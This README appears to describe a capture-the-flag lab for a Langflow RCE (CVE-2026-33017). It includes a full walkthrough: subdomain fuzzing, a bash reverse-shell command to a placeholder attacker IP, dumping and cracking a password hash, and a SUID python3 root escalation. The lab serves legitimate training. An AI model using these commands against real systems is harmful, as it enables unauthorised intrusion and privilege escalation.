Exploit for Code Injection in Langflow CVE-2026-33017

## https://sploitus.com/exploit?id=1B83B262-82FC-537F-BB58-641F6536FDBC
# 🎯 FlowBreaker

> **CVE-2026-33017** — HTB-Style Pentest Lab

```
╔══════════════════════════════════════════════════════════════╗
║  Machine : FlowBreaker                                      ║
║  OS      : Linux                                            ║
║  Rating  : Medium                                           ║
║  CVE     : CVE-2026-33017 (Langflow RCE)                    ║
║  Author  : Bikash                                           ║
╚══════════════════════════════════════════════════════════════╝
```

## 📋 Overview

FlowBreaker simulates a real-world penetration testing scenario targeting a vulnerable AI workflow platform. The machine requires subdomain enumeration, exploitation of a critical unauthenticated RCE vulnerability (CVE-2026-33017), and Linux privilege escalation to capture both flags.

### Attack Surface
- **Domain:** `langflow.hack`
- **Type:** Web Application + Hash Cracking + SSH + Linux Privesc
- **Flags:** `user.txt` and `root.txt` (random hex, regenerated on every restart)

---

## 🚀 Quick Start

### Prerequisites
- Docker & Docker Compose
- `ffuf` (for subdomain enumeration)

### Setup

```bash
# 1. Clone/navigate to the lab directory
cd CVE-2026-33017-lab

# 2. Make scripts executable
chmod +x scripts/setup.sh scripts/reset.sh

# 3. Run the setup (adds /etc/hosts entries, builds & starts containers)
sudo bash scripts/setup.sh
```

### Reset (Regenerate Flags)

```bash
sudo bash scripts/reset.sh
```

### Teardown

```bash
docker compose down -v
```

---

## 🏗️ Architecture

```
                    ┌─────────────────────┐
                    │   Attacker Machine   │
                    └──────────┬──────────┘
                               │
                         Port 80 (HTTP)
                               │
                    ┌──────────▼──────────┐
                    │   Nginx Proxy       │
                    │   (Subdomain Router)│
                    └──────────┬──────────┘
                               │
             ┌─────────────────┴─────────────────┐
             │                                   │
     ┌───────▼───────┐                   ┌────── ▼───────┐
     │ langflow.hack  │                   │ dev.langflow  │
     │ Landing Page  │                   │ .hack         │
     │ (Static HTML) │                   │ Langflow      │
     └───────────────┘                   │ v1.8.1 ★     │
                                         │ (VULNERABLE)  │
                                         └───────────────┘
```

### Subdomains

| Subdomain | Purpose | Response |
|-----------|---------|----------|
| `langflow.hack` | Corporate landing page | 200 — Static site |
| `dev.langflow.hack` | **★ Vulnerable Langflow** | 200 — Langflow UI |

---

---

## 🔐 Flags

Both flags are stored in **hex format** and **regenerate on every container restart**:

| Flag | Location | Access |
|------|----------|--------|
| `user.txt` | `/home/spydomain/user.txt` | Readable via SSH as `spydomain` |
| `root.txt` | `/root/root.txt` | Readable only as root |

---

## ⚠️ Disclaimer

This lab is designed for **educational and authorized security testing purposes only**. Do not use these techniques against systems without explicit permission.

---


💡 Hints (click to reveal)

### Hint 1 — Enumeration
> Check the HTML source code of the landing page. Are there any comments left by the developers?

### Hint 2 — Exploitation
> The dev subdomain runs Langflow 1.8.1. What CVE affects this version? RCE will get you a `www-data` shell.

### Hint 3 — Lateral Movement
> As `www-data`, look around `/opt/webapp/`. Is there a database containing credentials? You might need to extract a hash and crack it to SSH as a local user.

### Hint 4 — Privilege Escalation
> Check for SUID binaries. One of them is unusual and very powerful.




📖 Full Walkthrough (SPOILER WARNING)

### Step 1: Subdomain Enumeration

```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -u http://langflow.hack \
     -H "Host: FUZZ.langflow.hack" \
     -fc 404
```

You'll discover: `dev`, `www`, `api`, `admin`, `staging`

### Step 2: Investigate dev.langflow.hack

```bash
curl -s http://dev.langflow.hack/health
# → Langflow health check response

curl -sI http://dev.langflow.hack
# → X-Powered-By: Langflow/1.8.1
```

### Step 3: Exploit CVE-2026-33017

```bash
# Start listener
nc -lvnp 4444

# Use a public PoC script (like the one found in the poc.txt file):
python3 poc.py \
    --url http://dev.langflow.hack \
    --cmd "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```

This gives you a reverse shell as the `www-data` user.

### Step 4: Privilege Escalation (Lateral Movement to spydomain)

```bash
# Enumerate the filesystem and find the database backup
ls -la /opt/webapp
sqlite3 /opt/webapp/langflow.db.bak "SELECT * FROM users;"
# Extracted hash for spydomain: 55aa7decfc6eecfb2d35e197baec1ec31dbccbc4b841793792c3a5099307dce8

# Crack the hash using John the Ripper or Hashcat
echo "55aa7decfc6eecfb2d35e197baec1ec31dbccbc4b841793792c3a5099307dce8" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 hash.txt
# Result: butterfly

# SSH into the container
ssh spydomain@dev.langflow.hack -p 2222
# Password: butterfly
```

### Step 5: Get User Flag

```bash
cat /home/spydomain/user.txt
```

### Step 6: Privilege Escalation (Root)

```bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Python3 has SUID!
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

# Get root flag
cat /root/root.txt
```